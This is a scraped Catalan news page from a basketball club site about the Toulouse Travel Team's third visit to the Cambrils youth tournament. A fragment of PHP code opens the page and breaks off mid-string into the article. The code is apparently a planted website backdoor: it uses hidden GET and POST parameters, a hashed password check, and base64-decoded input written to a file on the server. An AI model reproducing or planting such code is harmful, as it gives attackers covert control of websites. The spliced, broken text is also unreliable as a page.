function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Toulouse Travel Team, fidel a la cita de Cambrils - Tgn Bàsquet Club -

El Toulouse Travel Team, fidel a la cita de Cambrils

By
Updated: abril 13, 2014

El Toulouse Travel Team és un concepte nou dins del món del bàsquet tradicional. No és un club en el sentit usual de la paraula, tampoc un equip, és més aviat una selecció de jugadors d’arreu de França i d’Europa que tenen en comú el bàsquet. Un dels seus creadors és David Fauthoux que, amb la d’enguany, ja compta amb tres edicions de Cambrils en el seu historial. “És la tercera vegada que venim i puc assegurar que el Torneig de Cambrils és el millor de tots els que coneixem. L’organització és perfecta, la competició molt interessant perquè hi ha diferents nivells d’equips i l’ambient és genial”, assegura Fauthoux que, fa cinc anys va decidir endegar un projecte amb un altre entrenador d’un altre club. “Fa cinc anys, quan estava al meu club d’aleshores em vaig adonar que no era feliç fent el que feia en el bàsquet. Aleshores, juntament amb un amic d’un altre club, vam decidir fusionar els dos equips amb els jugadors que teníem i vam cridar alguns de fora per fundar el Toulouse Travel Team”, explica. És una organització que tria diferents jugadors no tan sols per les seves aptituds basquetbolístiques sinó pels seus valors humans. Així, en aquesta edició, hi ha, fins i tot, un jugador sudamericà. “Tenim vuit jugadors francesos, un irlandès i un altre d’Argentina. Els meus jugadors no es coneixien abans d’arribar a Cambrils i el fet que la gent sigui tan amable aquí fa que agafin confiança de seguida. Així, al segon dia, ja són amics”, assegura David Fauthoux.

L’objectiu general de Toulouse Travel Team és fer un equip nou cada any amb integrans de tot arreu, possibilitant als joves jugadors una experiència més enllà del bàsquet. “Pel Tolouse Travel Team, el bàsquet és només un nexe pels nois que formen l’equip. Ells no parlen la mateixa llengua, però tenen la mateixa passió”, diu. Segons Fauthoux, la tria dels jugadors es fa gràcies als seus nombrosos contactes en el món del bàsquet. “Conec moltíssims entrenadors d’arreu del món perquè viatjo molt per culpa de la meva feina [enginyer informàtic]. Quan sóc fora, sempre intento quedar amb gent relacionada amb el bàsquet”, explica.

 

Lloances al Torneig del TGN Bàsquet

David Fauthoux assegura que el Torneig de Cambrils els va servir de projecció quan van decidir participar-hi ara fa tres anys. “La primera vegada que vam participar a Cambrils vam trucar Iñaki dues setmanes abans del Torneig i ens va dir que ens podíem inscriure perquè hi havia una baixa d’última hora. Va ser genial i ens va servir de llançament pel nostre projecte”, afirma Fauthoux alhora que assegura que aquest tipus de campionats són inexistents en tota França. “No hi ha tornejos com el de Cambrils al sud de França. Allà només pots trobar campionats d’un sol dia o de dos, com a molt. Al nord de França sí que n’hi han alguns de semblants, però només duren tres dies”, diu.

En el seu periple buscant competicions per formar els joves jugadors, Fauthoux assenyala un altre Torneig a l’Estat prou interessant, tot i que no de l’envergadura del de Cambrils. “Ens agrada un altre torneig a Espanya com el de Jaca, que organitza la Federación Aragonesa, però no té la durada d’aquest. Allà som l’únic equip estranger que hi participa”, explica. El responsable del Toulouse Travel Team assenyala que s’han marcat dos objectius per la cita cambrilenca, una més personal i l’altra purament competitiva: “Tenim dos objectius clars per aquest torneig. El primer de tot és construir un equip del no res perquè tenim jugadors que no es coneixien fins arribar aquí, que parlen tres llengües diferents. El segon objectiu és arribar el més amunt possible dins el Torneig, poder disputar partits difícils. L’any passat vam arribar a semifinals i vam perdre perquè el rival era molt bo però va ser genial per nosaltres perquè ens va permetre competir a un gran nivell”.

La filosofia del Toulouse Travel Team i l’equip de treball del TGN Bàsquet van cristal·litzar fa uns mesos en un intercanvi que va permetre l’equip infantil masculí A del club lila viatjar fins a Toulouse per participar en una sèrie de partits contra diferents equips francesos. Els jugadors i cos tècnic del TGN Bàsquet van ser allotjats en els domicilis particulars de jugadors i organització francesos per enfortir els vincles entre ambdues institucions i persones.

 

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *